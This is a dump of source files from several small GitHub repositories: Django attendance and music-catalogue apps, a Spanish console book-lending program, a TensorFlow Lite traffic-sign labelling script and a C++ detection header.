login_url='login')\ndef create(request):\n form = UserRegisterForm(request.POST or None)\n\n if form.is_valid():\n form.save()\n return redirect('/')\n\n return render(request, 'main/create.html', {'form':form})\n\n\n@permission_required('is_superuser', raise_exception=True)\ndef employee(request):\n employee = Employee.objects.all().order_by('-id')\n return render(request, 'main/employees.html', {'employee': 
employee})\n\n\n@login_required(login_url='login')\ndef employ(request, name):\n if request.method == 'POST':\n u_form = UserUpdateForm(request.POST, instance=request.user)\n p_form = EmployeeUpdateForm(request.POST, request.FILES, instance=request.user.employee)\n if u_form.is_valid() and p_form.is_valid():\n u_form.save()\n p_form.save()\n return redirect('/')\n else:\n u_form = UserUpdateForm(instance=request.user)\n p_form = EmployeeUpdateForm(instance=request.user.employee)\n\n context = {\n 'u_form': u_form,\n 'p_form': p_form,\n }\n return render(request, 'main/employ.html', context)\n\n\ndef leave(request):\n form = LeaveForm(request.POST or None)\n\n if form.is_valid():\n leave = form.save(commit=False)\n leave.user = request.user\n if leave.date < datetime.now().date():\n leave.status = \"Granted\"\n leave.save()\n return redirect('/')\n\n return render(request, 'main/leave.html')\n\n\ndef entry(request):\n form = EntryForm(request.POST or None)\n\n if form.is_valid():\n entry = form.save(commit=False)\n entry.user = request.user\n entry.save()\n return redirect('/')\n return render(request, 'main/entry.html')\n\n\ndef exit(request):\n form = ExitForm(request.POST or None)\n if form.is_valid():\n exit = form.save(commit=False)\n exit.user = request.user\n now = datetime.now()\n time = now.strftime(\"%H\")\n if time < '4':\n exit.status = \"Half Day\"\n else:\n exit.status = \"Full Day\"\n exit.save()\n return redirect('/')\n else:\n return render(request, 'main/exit.html')\n\n\ndef attendance(request, user):\n entry = Entry.objects.filter(user=request.user)\n exit = Exit.objects.filter(user=request.user)\n now = datetime.now()\n month = now.strftime(\"%B\")\n context = {\n 'exit': exit,\n 'entry':entry,\n 'month': month,\n }\n return render(request, \"main/details.html\", context)\n\n\ndef grant(request, pk):\n leave = get_object_or_404(Leave, pk=pk)\n\n if request.method == 'POST':\n leave.status = \"Granted\"\n leave.save()\n return redirect('/home')\n\n return render(request, 'main/grant.html', {'leave': leave})\n\n\ndef reject(request, pk):\n leave = get_object_or_404(Leave, pk=pk)\n\n if request.method == 'POST':\n leave.status = \"rejected\"\n leave.save()\n return redirect('/home')\n\n return render(request, 'main/reject.html', {'leave': leave})\n\n\n@login_required\ndef profile(request):\n return HttpResponseRedirect(reverse('detail', args=[request.user.username]))\n\n\ndef all_attendence(request):\n entry = Entry.objects.all()\n exit = Exit.objects.all()\n context = {\n 'entry': entry,\n 'exit': exit,\n }\n return render(request, 'main/attendance.html', context)\n\n\ndef all_leave(request):\n leave = Leave.objects.all()\n return render(request, 'main/leaves.html', {'leave': leave})\n\n\ndef leaves(request, user):\n leave = Leave.objects.filter(user=request.user)\n context = {\n 'leave':leave,\n }\n return render(request, \"main/leaves.html\", context)\n\n\ndef profiles(request,name):\n user = request.user\n employee = Employee.objects.all().filter(user=user)\n total = 12\n count = Leave.objects.all().filter(user=request.user).filter(status='Granted').count()\n available = total - count\n content = {\n 'employee': employee,\n 'total': total,\n 'count': count,\n 'available': available,\n }\n\n return render(request, 'main/employs.html', content)\n\n\n\n\n" } ]
num_files: 6

repo_name: solanoluis/GestiondeLibros
repo_url: https://github.com/solanoluis/GestiondeLibros
snapshot_id: a88019a555aeb6344fe3f64fa76a1651409784ef
revision_id: d42fbfcfd7207c8d2a3a474c7bd092c9b63ac78b
directory_id: 0eb8101d195fc95083094645fef890f28afaf824
branch_name: refs/heads/master
visit_date: 2022-11-16T22:37:45.560844
revision_date: 2020-07-07T18:10:50
committer_date: 2020-07-07T18:10:50
github_id: 277,401,527
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_created_at: null
gha_updated_at: null
gha_pushed_at: null
gha_language: null
files:
[ { "alpha_fraction": 0.42728298902511597, "alphanum_fraction": 0.4322435259819031, "avg_line_length": 32.7529411315918, "blob_id": "b69eddc404313272422fc7d879d28b305c7cf468", "content_id": "e2f53367956e3c2b47b15558b4738376cf556dcc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8875, "license_type": "no_license", "max_line_length": 117, "num_lines": 255, "path": "/Proyecto Luis Solano.py", "repo_name": "solanoluis/GestiondeLibros", "src_encoding": "UTF-8", "text": "import os\r\nimport csv\r\nimport operator\r\nimport sys\r\nimport time\r\n\r\nsalida = False\r\n\r\n#********************************************************************************************************************\r\n#FUNCION QUE DIBUJA EL MENU Y LLAMA A LA FUNCION QUE VALIDA QUE LA OPCION DEL MENU SEA CORRECTA\r\ndef dibujaMenu():\r\n os.system('cls')\r\n print(\"***************************************\")\r\n print(\"Gestión y Control de Préstamo de Libros\")\r\n print(\"***************************************\")\r\n print(\"\")\r\n print(\"a - Ver lista de personas\")\r\n print(\"b - Ordenar lista de personas\")\r\n print(\"c - Imprimir registro de lista de persona\")\r\n print(\"d - Ver lista de libros\")\r\n print(\"e - Buscar libro\")\r\n print(\"f - Prestar libro\")\r\n print(\"g - Devolver libro\")\r\n print(\"h - Ver libros prestados\")\r\n print(\"i - Salir\")\r\n print(\"\")\r\n\r\n#********************************************************************************************************************\r\n#MUESTRA LISTA DE PERSONAS\r\n#OPCION A DEL MENU\r\ndef muestraPersonas():\r\n with open (\"personas.csv\", \"r\") as csv_personas:\r\n csv_reader = csv.DictReader(csv_personas)\r\n\r\n for line in csv_reader:\r\n print(\"Indice: \",line[\"Indice\"])\r\n print(\"Cedula: \",line[\"Identificación\"])\r\n print(\"Nombre: \", line[\"Nombre\"], \" \", end=\"\")\r\n print(line[\"Primer Apellido\"], \" \", end=\"\")\r\n print(line[\"Segundo Apellido\"],)\r\n print(\"E-mail: \", line[\"Correo Electrónico\"])\r\n print(\"\")\r\n input(\"Presione un ENTER para continuar...\")\r\n\r\n#********************************************************************************************************************\r\n#ORDENA LA LISTA DE PERSONAS POR PRIMER APELLIDO\r\n#OPCION B DEL MENU\r\ndef ordenLista():\r\n print(\"1. Ordenar la lista por Cedula\")\r\n print(\"2. Ordenar la lista por Nombre\")\r\n print(\"3. Ordenar la lista por Primer Apellido\")\r\n print(\"4. Ordenar la lista por segundo Apellido\")\r\n print(\"5. 
Ordenar la lista por correo electronico\")\r\n\r\n op = int(input())\r\n print(\"\")\r\n\r\n sample = open(\"personas.csv\", \"r\")\r\n csv1 = csv.reader(sample)\r\n next(csv1, None)\r\n sort = sorted(csv1,key=operator.itemgetter(op)) \r\n for eachline in sort:\r\n print(eachline[1], \" \", eachline[2], \" \", eachline[3], \" \",eachline[4], \" \", eachline[5])\r\n\r\n input(\"Presione un ENTER para continuar...\")\r\n\r\n#********************************************************************************************************************\r\n#IMPRIME REGISTRO DE LISTA DE PERSONAS\r\n#OPCION C DEL MENU\r\ndef imprimePersona():\r\n csv_file = csv.reader(open('personas.csv', \"r\"))\r\n\r\n row_count = sum(1 for row in csv_file)\r\n print(\"Exiten \", row_count-1, \"registros guardados.\")\r\n\r\n op = input(\"Digite el numero de registro que desea ver: \")\r\n\r\n csv_file = csv.reader(open('personas.csv', \"r\"))\r\n\r\n for row in csv_file:\r\n if op == row[0]:\r\n print(\"\")\r\n print(\"**********************************\")\r\n print (\"Cedula: \", row[1])\r\n print (\"Nombre: \", row[2])\r\n print (\"Primer Apellido: \", row[3])\r\n print (\"Segundo Apellido: \", row[4])\r\n print(\"**********************************\")\r\n\r\n input(\"Presione un ENTER para continuar...\")\r\n\r\n#********************************************************************************************************************\r\n#IMPRIME REGISTRO DE LISTA DE LIBROS\r\n#OPCION D DEL MENU\r\ndef imprimeLibros():\r\n with open (\"libros.csv\", \"r\") as csv_personas:\r\n csv_reader = csv.DictReader(csv_personas)\r\n\r\n for line in csv_reader:\r\n #print(line[\"idLibro\"], \" - \", \"Genero: \", line[\"Genero\"])\r\n print(line[\"idLibro\"], \"|\",\"Titulo: \", line[\"nombre\"], \"| \", end=\"\")\r\n print(\"Autor: \", line[\"Autor\"],)\r\n print(\"\")\r\n\r\n input(\"Presione un ENTER para continuar...\")\r\n\r\n#********************************************************************************************************************\r\n#FUNCION QUE BUSCA UN LIBRO\r\n#OPCION E DEL MENU\r\ndef buscaLibro():\r\n with open (\"libros.csv\", \"r\") as csv_personas:\r\n csv_reader = csv.DictReader(csv_personas)\r\n\r\n for line in csv_reader:\r\n print(\"Identificador del libro: \",line[\"idLibro\"])\r\n print(\"Titulo: \", line[\"nombre\"], \" \")\r\n print(\"\")\r\n\r\n number = input(\"Digite el indice del libro a mostrar: \")\r\n\r\n csv_file = csv.reader(open('libros.csv', \"r\"))\r\n\r\n for row in csv_file:\r\n if number == row[0]:\r\n print(\"\")\r\n print(\"**********************************\")\r\n print (\"Titulo: \", row[1])\r\n print (\"Genero: \", row[2])\r\n print (\"Autor: \", row[3])\r\n print (\"Estatus del libro: \", row[4])\r\n print(\"**********************************\")\r\n\r\n input(\"Presione un ENTER para continuar...\")\r\n\r\n#********************************************************************************************************************\r\n#FUNCION PARA MOSTRAR LIBROS DISPONIBLE Y PRESTAR UNO\r\n#OPCION F DEL MENU\r\ndef prestaLibro():\r\n csv_file = csv.reader(open('libros.csv', \"r\"))\r\n\r\n print(\"Libros disponibles\")\r\n\r\n for row in csv_file:\r\n\r\n if row[4] == \"Disponible\":\r\n print (\"Identificador: \", row[0])\r\n print (\"Titulo: \", row[1])\r\n print (\"Genero: \", row[2])\r\n print (\"Autor: \", row[3])\r\n print (\"Estatus del libro: \", row[4])\r\n print(\"**********************************\")\r\n \r\n opLibro = int(input(\"Digite el identificador del libro que desea: 
\"))\r\n\r\n r = csv.reader(open('libros.csv', \"r\"))\r\n lines = list(r)\r\n\r\n lines[opLibro][4] = \"No Disponible\"\r\n\r\n writer = csv.writer(open('libros.csv', 'w', newline='\\n'))\r\n writer.writerows(lines)\r\n \r\n print(\"Se le ha prestado este libro!\")\r\n print(\"\")\r\n input(\"Presione un ENTER para continuar...\")\r\n\r\n#********************************************************************************************************************\r\n#FUNCION PARA DEVOLVER LIBROS\r\n#OPCION G DEL MENU\r\ndef devuelveLibro():\r\n csv_file = csv.reader(open('libros.csv', \"r\"))\r\n\r\n print(\"Libros disponibles\")\r\n\r\n for row in csv_file:\r\n\r\n if row[4] == \"No Disponible\":\r\n print (\"Identificador: \", row[0])\r\n print (\"Titulo: \", row[1])\r\n print (\"Genero: \", row[2])\r\n print (\"Autor: \", row[3])\r\n print(\"**********************************\")\r\n \r\n opLibro = int(input(\"Digite el identificador del libro que desea: \"))\r\n\r\n r = csv.reader(open('libros.csv', \"r\"))\r\n lines = list(r)\r\n\r\n lines[opLibro][4] = \"Disponible\"\r\n\r\n writer = csv.writer(open('libros.csv', 'w', newline='\\n'))\r\n writer.writerows(lines)\r\n\r\n print(\"Su libro ha sido devuelto!\")\r\n print(\"\")\r\n input(\"Presione un ENTER para continuar...\")\r\n\r\n#********************************************************************************************************************\r\n#MUESTRA LIBROS PRESTADOS\r\n#OPCION H DEL MENU\r\ndef librosPrest():\r\n print(\"\")\r\n print(\"Libros prestados\")\r\n print(\"\")\r\n\r\n csv_file = csv.reader(open('libros.csv', \"r\")) \r\n for row in csv_file:\r\n\r\n if row[4] == \"No Disponible\":\r\n print (\"Titulo: \", row[1])\r\n print (\"Genero: \", row[2])\r\n print (\"Autor: \", row[3])\r\n print(\"**********************************\")\r\n\r\n input(\"Presione un ENTER para continuar...\")\r\n\r\n#********************************************************************************************************************\r\n#VALIDA OPCION DE MENU\r\nlist_resp = [\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\",\"i\"]\r\n\r\n#********************************************************************************************************************\r\n#ELIGE FUNCION SEGUN VARIABLE OP, SI SE ELIGIO UNA OPCION INCORRECTA VUELVE A MOSTRAR EL MENU\r\ndef opMenu(op):\r\n if op in list_resp:\r\n if op == \"a\":\r\n muestraPersonas()\r\n if op == \"b\":\r\n ordenLista()\r\n if op == \"c\":\r\n imprimePersona()\r\n if op == \"d\":\r\n imprimeLibros()\r\n if op == \"e\":\r\n buscaLibro()\r\n if op == \"f\":\r\n prestaLibro()\r\n if op == \"g\":\r\n devuelveLibro()\r\n if op == \"h\":\r\n librosPrest()\r\n else:\r\n print(\"Opción invalida!\")\r\n time.sleep(1)\r\n\r\n#********************************************************************************************************************\r\n#INICIO\r\nwhile (salida == False):\r\n dibujaMenu()\r\n op = input(\"Por favor seleccione una opcion: \")\r\n if op == \"i\":\r\n print(\"Lo esperamos pronto!\")\r\n time.sleep(1)\r\n salida = True\r\n else:\r\n opMenu(op)\r\n\r\n\r\n\r\n\r\n" } ]
num_files: 1

repo_name: yamannassar/salalemTask-api
repo_url: https://github.com/yamannassar/salalemTask-api
snapshot_id: 34beac1370569ea247dfd6c54ed9cf4e9c582fab
revision_id: e1f385641446eaefa1126dc0578c73bc2c29923b
directory_id: 94c8d4bb1efac7298bbee222ad835ea357294884
branch_name: refs/heads/main
visit_date: 2023-02-26T16:26:55.010214
revision_date: 2021-02-01T09:05:23
committer_date: 2021-02-01T09:05:23
github_id: 331,559,547
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_created_at: null
gha_updated_at: null
gha_pushed_at: null
gha_language: null
files:
[ { "alpha_fraction": 0.6905916333198547, "alphanum_fraction": 0.6905916333198547, "avg_line_length": 20.47916603088379, "blob_id": "ca4660fef11e497dcc0864d45c93de74d35eb006", "content_id": "e17328c7a4f316cd0d5b9cac7b9c9e49d7a001cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1031, "license_type": "no_license", "max_line_length": 49, "num_lines": 48, "path": "/music/schema.py", "repo_name": "yamannassar/salalemTask-api", "src_encoding": "UTF-8", "text": "import graphene\nfrom graphene_django import DjangoObjectType\n\nfrom .models import Album, Artist, Song\n\n\nclass ArtistType(DjangoObjectType):\n class Meta:\n model = Artist\n fields = '__all__'\n\n\nclass AlbumType(DjangoObjectType):\n class Meta:\n model = Album\n fields = '__all__'\n\n\nclass SongType(DjangoObjectType):\n class Meta:\n model = Song\n fields = '__all__'\n\n\nclass ArtistQuery(graphene.ObjectType):\n all_artists = graphene.List(ArtistType)\n\n def resolve_all_artists(root, info):\n return Artist.objects.all()\n\n\nclass AlbumQuery(graphene.ObjectType):\n all_albums = graphene.List(AlbumType)\n\n def resolve_all_albums(root, info):\n return Album.objects.all()\n\n\nclass SongQuery(graphene.ObjectType):\n all_songs = graphene.List(SongType)\n\n def resolve_all_songs(root, info):\n return Song.objects.all()\n\n\nartistSchema = graphene.Schema(query=ArtistQuery)\nalbumSchema = graphene.Schema(query=AlbumQuery)\nsongSchema = graphene.Schema(query=SongQuery)\n" }, { "alpha_fraction": 0.694857120513916, "alphanum_fraction": 0.694857120513916, "avg_line_length": 52.030303955078125, "blob_id": "cccd6191fa063ad36094ed2d251858b0206b1946", "content_id": "22d2bc3846f1f28c811f4a76c0faf62ef6a59a02", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1750, "license_type": "no_license", "max_line_length": 93, "num_lines": 33, "path": "/music/urls.py", "repo_name": "yamannassar/salalemTask-api", "src_encoding": "UTF-8", "text": "# from django.urls import path\n# from . 
import views\n# from django.urls import path\n\n# urlpatterns = [\n# path('', views.musicOverview, name='music-overview'),\n# path('artists-list/', views.artistsList, name='artists-list'),\n# path('artists-list/<str:pk>', views.getArtist, name='artist-info'),\n# path('add-artist/', views.addArtist, name='artist-create'),\n# path('update-artist/<str:pk>', views.updateArtist, name='artist-update'),\n# path('delete-artist/<str:pk>', views.deleteArtist, name='artist-delete'),\n# path('albums-list/', views.albumsList, name='albums-list'),\n# path('albums-list/<str:artistPk>', views.albumsByArtist, name='albums-by-artist'),\n# path('add-album/', views.addAlbum, name='album-create'),\n# path('update-album/<str:pk>', views.updateAlbum, name='album-update'),\n# path('delete-album/<str:pk>', views.deleteAlbum, name='album-delete'),\n# path('songs-list/', views.songsList, name='albums-list'),\n# path('songs-list/<str:albumPk>', views.songsByAlbum, name='songs-by-album'),\n# path('add-song/', views.addSong, name='song-create'),\n# path('update-song/<str:pk>', views.updateSong, name='song-update'),\n# path('delete-song/<str:pk>', views.deleteSong, name='song-delete'),\n# ]\n\nfrom django.urls import path\nfrom graphene_django.views import GraphQLView\nfrom django.views.decorators.csrf import csrf_exempt\nfrom music.schema import albumSchema, artistSchema, songSchema\n\nurlpatterns = [\n path(\"allArtists\", csrf_exempt(GraphQLView.as_view(graphiql=True, schema=artistSchema))),\n path(\"allAlbums\", csrf_exempt(GraphQLView.as_view(graphiql=True, schema=albumSchema))),\n path(\"allSongs\", csrf_exempt(GraphQLView.as_view(graphiql=True, schema=songSchema))),\n]\n" }, { "alpha_fraction": 0.674369752407074, "alphanum_fraction": 0.674369752407074, "avg_line_length": 20.636363983154297, "blob_id": "0eba69938cb4a76b962438f1806abe029b6ed23d", "content_id": "f182174ae8c15abbc52a653969483cd5372c70ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 476, "license_type": "no_license", "max_line_length": 52, "num_lines": 22, "path": "/music/serializers.py", "repo_name": "yamannassar/salalemTask-api", "src_encoding": "UTF-8", "text": "from rest_framework import serializers\nfrom .models import Artist\nfrom .models import Album\nfrom .models import Song\n\n\nclass ArtistSerializer(serializers.ModelSerializer):\n class Meta:\n model = Artist\n fields = '__all__'\n\n\nclass AlbumsSerializer(serializers.ModelSerializer):\n class Meta:\n model = Album\n fields = '__all__'\n\n\nclass SongsSerializer(serializers.ModelSerializer):\n class Meta:\n model = Song\n fields = '__all__'\n" }, { "alpha_fraction": 0.6994439363479614, "alphanum_fraction": 0.6994439363479614, "avg_line_length": 25.28461456298828, "blob_id": "5682e9da3c1f08d3527a0c7d6b473335fe80fa18", "content_id": "ffe2181efda5c68d959a138b843fd94dd2406ea8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3417, "license_type": "no_license", "max_line_length": 81, "num_lines": 130, "path": "/music/views.py", "repo_name": "yamannassar/salalemTask-api", "src_encoding": "UTF-8", "text": "from rest_framework import serializers\nfrom .models import Album, Artist, Song\nfrom django.shortcuts import render\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom .serializers import ArtistSerializer, AlbumsSerializer, SongsSerializer\n\n# Create your views here.\n\n\n@api_view(['GET'])\ndef musicOverview(request):\n 
music_urls = {\n 'List': '/artists-list/'\n }\n return Response(music_urls)\n\n\n@api_view(['GET'])\ndef artistsList(request):\n artists = Artist.objects.all()\n serializer = ArtistSerializer(artists, many=\"True\")\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef getArtist(request, pk):\n artists = Artist.objects.get(id=pk)\n serializer = ArtistSerializer(artists)\n return Response(serializer.data)\n\n\n@api_view(['POST'])\ndef addArtist(request):\n serializer = ArtistSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n\n\n@api_view(['POST'])\ndef updateArtist(request, pk):\n artist = Artist.objects.get(id=pk)\n serializer = ArtistSerializer(instance=artist, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n\n\n@api_view(['DELETE'])\ndef deleteArtist(request, pk):\n artist = Artist.objects.get(id=pk)\n artist.delete()\n return Response(\"The artist \" + artist.artist_name + \" deleted successfully\")\n\n\n@api_view(['GET'])\ndef albumsList(request):\n albums = Album.objects.all()\n serializer = AlbumsSerializer(albums, many=\"True\")\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef albumsByArtist(request, artistPk):\n album = Album.objects.filter(artist=artistPk)\n serializer = AlbumsSerializer(album, many=\"True\")\n return Response(serializer.data)\n\n\n@api_view(['POST'])\ndef addAlbum(request):\n serializer = AlbumsSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n\n\n@api_view(['POST'])\ndef updateAlbum(request, pk):\n album = Album.objects.get(id=pk)\n serializer = AlbumsSerializer(instance=album, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n\n\n@api_view(['DELETE'])\ndef deleteAlbum(request, pk):\n album = Album.objects.get(id=pk)\n album.delete()\n return Response(\"The album \" + album.album_title + \" deleted successfully\")\n\n\n@api_view(['GET'])\ndef songsList(request):\n songs = Song.objects.all()\n serializer = SongsSerializer(songs, many=\"True\")\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef songsByAlbum(request, albumPk):\n song = Song.objects.filter(album=albumPk)\n serializer = SongsSerializer(song, many=\"True\")\n return Response(serializer.data)\n\n\n@api_view(['POST'])\ndef addSong(request):\n serializer = SongsSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n\n\n@api_view(['POST'])\ndef updateSong(request, pk):\n song = Song.objects.get(id=pk)\n serializer = SongsSerializer(instance=song, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n\n\n@api_view(['DELETE'])\ndef deleteSong(request, pk):\n song = Song.objects.get(id=pk)\n song.delete()\n return Response(\"The song \" + song.song_title + \" deleted successfully\")\n" }, { "alpha_fraction": 0.5245901346206665, "alphanum_fraction": 0.5737704634666443, "avg_line_length": 19.33333396911621, "blob_id": "a75b2d6e7228caa425d98cc274d95fe3ca4e4fd8", "content_id": "8cb827db7274d16a6e93606bf71944b00b7b2196", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 366, "license_type": "no_license", "max_line_length": 46, "num_lines": 18, "path": "/music/migrations/0002_auto_20210131_1359.py", "repo_name": "yamannassar/salalemTask-api", "src_encoding": "UTF-8", "text": "# 
Generated by Django 3.0 on 2021-01-31 13:59\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('music', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='artist',\n name='photo',\n field=models.URLField(blank=True),\n ),\n ]\n" }, { "alpha_fraction": 0.643059492111206, "alphanum_fraction": 0.655807375907898, "avg_line_length": 21.774192810058594, "blob_id": "f7676959ed7ba50ce65bf0db843e7dbde96b1eb9", "content_id": "bb72b34015079471051cbdf7bb35c498b976f0fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 706, "license_type": "no_license", "max_line_length": 64, "num_lines": 31, "path": "/music/models.py", "repo_name": "yamannassar/salalemTask-api", "src_encoding": "UTF-8", "text": "from django.db import models\n\n\nclass Artist(models.Model):\n artist_name = models.CharField(max_length=250)\n photo = models.URLField(blank=True)\n\n def __str__(self):\n return self.artist_name\n\n\nclass Album(models.Model):\n artist = models.ForeignKey(Artist, on_delete=models.CASCADE)\n album_title = models.CharField(max_length=250)\n\n def __str__(self):\n return self.album_title\n\n class Meta:\n ordering = ['album_title']\n\n\nclass Song(models.Model):\n album = models.ForeignKey(Album, on_delete=models.CASCADE)\n song_title = models.CharField(max_length=250)\n\n def __str__(self):\n return self.song_title\n\n class Meta:\n ordering = ['song_title']\n" } ]
6
asqw887/BILYEO_SHOP
https://github.com/asqw887/BILYEO_SHOP
0dc8fd1da9dbceb36a8e3ede99555bf7bfe378e1
79ececf70917bedc12e68584187f1ab7e19e35ad
a5bc59fa01f022f7f258aab0e0f6b95bbc2b1814
refs/heads/main
2022-12-30T14:53:47.203976
2020-10-23T18:44:33
2020-10-23T18:44:33
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7797784209251404, "alphanum_fraction": 0.7880886197090149, "avg_line_length": 31.863636016845703, "blob_id": "6702bda276a8a068b0664ffe635994be25c7a6f2", "content_id": "31baefd979f069f5db13a158188fa94bade2e7c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 722, "license_type": "no_license", "max_line_length": 64, "num_lines": 22, "path": "/store/models/order.py", "repo_name": "asqw887/BILYEO_SHOP", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom .customer import Customer\nfrom .product import Product\nimport datetime\nfrom django import forms\n\nclass Order(models.Model):\n\tproduct = models.ForeignKey(Product,on_delete=models.CASCADE)\n\tcustomer = models.ForeignKey(Customer,on_delete=models.CASCADE)\n\tquantity = models.IntegerField(default=1)\n\tprice = models.IntegerField()\n\tdate = models.DateField(default=datetime.datetime.today)\n\taddress = models.CharField(max_length=255,blank=True)\n\tphone = models.CharField(max_length=15,blank=True)\n\tcompleted = models.BooleanField(default=False)\n\tstart_date = forms.DateTimeField(required=True)\n\tend_date = forms.DateTimeField(required=True)\n\t\n\n\t\n\tdef __str__(self):\n\t\treturn self.customer.email" } ]
1
jordanking94/TrafficSigns
https://github.com/jordanking94/TrafficSigns
4da3326fc97767ec00690fbef67f72e56b755aac
1895e1b2d34420f33d497b0cd41f154d797bb9ef
e7036dbdb30ccd7faa39f47a9559f953cc64863e
refs/heads/master
2022-11-06T02:26:47.059243
2020-06-26T00:30:12
2020-06-26T00:30:12
274,315,775
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6138504147529602, "alphanum_fraction": 0.6520775556564331, "avg_line_length": 30.63157844543457, "blob_id": "9564436f7044314d12fa47d73ca285856b057843", "content_id": "82bdcdc68398887a12d31ecd1f0ca1cfed68aaa4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1805, "license_type": "no_license", "max_line_length": 84, "num_lines": 57, "path": "/clusterbased-build/scripts/label.py", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "\n\nimport numpy as np\nimport tensorflow as tf\nimport cv2 as cv\n\ntf.compat.v1.enable_eager_execution\nmodel_path = \"tf_files/graph.lite\"\n\ninterpreter = tf.compat.v2.lite.Interpreter(model_path=model_path)\ninterpreter.allocate_tensors()\n\ninput_details = interpreter.get_input_details()\noutput_details = interpreter.get_output_details()\n\ninput = interpreter.tensor(input_details[0][\"index\"])\noutput = interpreter.tensor(output_details[0][\"index\"])\n\nmean = 128\nstd_dev = 127\n\nheight = input_details[0]['shape'][1]\nwidth = input_details[0]['shape'][2]\n\nfloating_model = False\nif input_details[0]['dtype'] == type(np.float32(1.0)):\n floating_model = True\n\n\ndef label(img_data, x, y, xs, ys):\n image = np.asarray(img_data,dtype=\"uint8\")\n image = np.reshape(image, (240, 320, 3))\n #print('x: ' + str(x) + ', y: ' + str(y) + 'xs: ' + str(xs) +', ys: ' + str(ys))\n sub_image = image[y:y+ys, x:x+xs,:]\n sub_image = cv.cvtColor(sub_image, cv.COLOR_BGR2RGB)\n sub_image = cv.resize(sub_image, (128,128))\n sub_image = np.reshape(sub_image, (1,128, 128, 3))\n #print(sub_image.shape)\n #image = shaped_full_image[1,x:xs,y:ys,:]\n #cv.imshow('display', sub_image )\n #cv.waitKey(0)\n \n \n sub_image = np.reshape(sub_image, (1,128, 128, 3))\n #image = full_image[0:128, 0:128]\n \n #image = np.reshape(image, (1,img_height, img_width, 3))\n\n if floating_model:\n sub_image = np.float32(sub_image)\n sub_image = (sub_image - mean) / std_dev\n interpreter.set_tensor(input_details[0]['index'], sub_image)\n\n interpreter.invoke()\n predictions = np.squeeze(output()[0])\n predicted_confidence = max(predictions)\n object_class = np.where(predictions==predicted_confidence)\n object_class = object_class[0][0]\n return (object_class, predicted_confidence)\n" }, { "alpha_fraction": 0.43321096897125244, "alphanum_fraction": 0.43462297320365906, "avg_line_length": 24.846715927124023, "blob_id": "62d93acfe328ab39c89d6b6f34f320014e743293", "content_id": "499ad86b0a79aa10503053fb70565bf6dca1e7d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3541, "license_type": "no_license", "max_line_length": 105, "num_lines": 137, "path": "/clusterbased/backup/TSDR.hpp", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "#define DEFAULT_LIFETIME 2\n\nnamespace TSDR\n{\n \n \n \n class Cluster {\n public:\n int id;\n int x, y, w, h;\n int n; // number of keypoints in cluster\n \n int kp_xmin, kp_ymin;\n int kp_xmax, kp_ymax;\n \n std::list<cv::KeyPoint> associated;\n \n Cluster () {}\n\n void add_keypoint(cv::KeyPoint kp) {\n this->associated.push_back(kp);\n this->n++;\n int x = int(kp.pt.x);\n int y = int(kp.pt.y);\n if(x<this->kp_xmin) this->kp_xmin=x;\n else if(x>this->kp_xmax) this->kp_xmax=x;\n if(y<this->kp_ymin) this->kp_ymin=y;\n else if(y>this->kp_ymax) this->kp_ymax=y;\n }\n \n Cluster(int id, int x, int y, int w, int h) {\n this->id = id;\n this->x = x;\n this->y = y;\n this->w = w;\n this->h 
= h;\n \n kp_xmin=INT_MAX;\n kp_xmax=0;\n kp_ymin=INT_MAX;\n kp_ymax=0;\n }\n \n };\n \n class ROI {\n public:\n int x, y; // x, y coords of top left corner\n int xs, ys; // width, height respectively\n int priority;\n int ref;\n \n ROI (int x, int y, int xs, int ys) {\n this->x = x;\n this->y = y;\n this->xs = xs;\n this->ys = ys;\n }\n \n ROI (int x, int y, int xs, int ys, int priority) {\n this->x = x;\n this->y = y;\n this->xs = xs;\n this->ys = ys;\n this->priority = priority;\n }\n \n ROI (int x, int y, int xs, int ys, int priority, int ref) {\n this->x = x;\n this->y = y;\n this->xs = xs;\n this->ys = ys;\n this->priority = priority;\n this->ref = ref;\n }\n };\n bool compareROIs (ROI a, ROI b) { return a.priority>b.priority; }\n \n class Detection {\n public:\n int object_class;\n double confidence;\n int x,y; // x,y coords of top left corner\n int xs,ys; // width, height respectively\n Cluster* associated_cluster;\n \n Detection (int object_class, double confidence, int x, int y, int xs, int ys, Cluster *cluster) {\n this->object_class = object_class;\n this->confidence = confidence;\n this->x = x;\n this->y = y;\n this->xs = xs;\n this->ys = ys;\n this->associated_cluster = cluster;\n }\n \n Detection (int object_class, double confidence, int x, int y, int xs, int ys) {\n this->object_class = object_class;\n this->confidence = 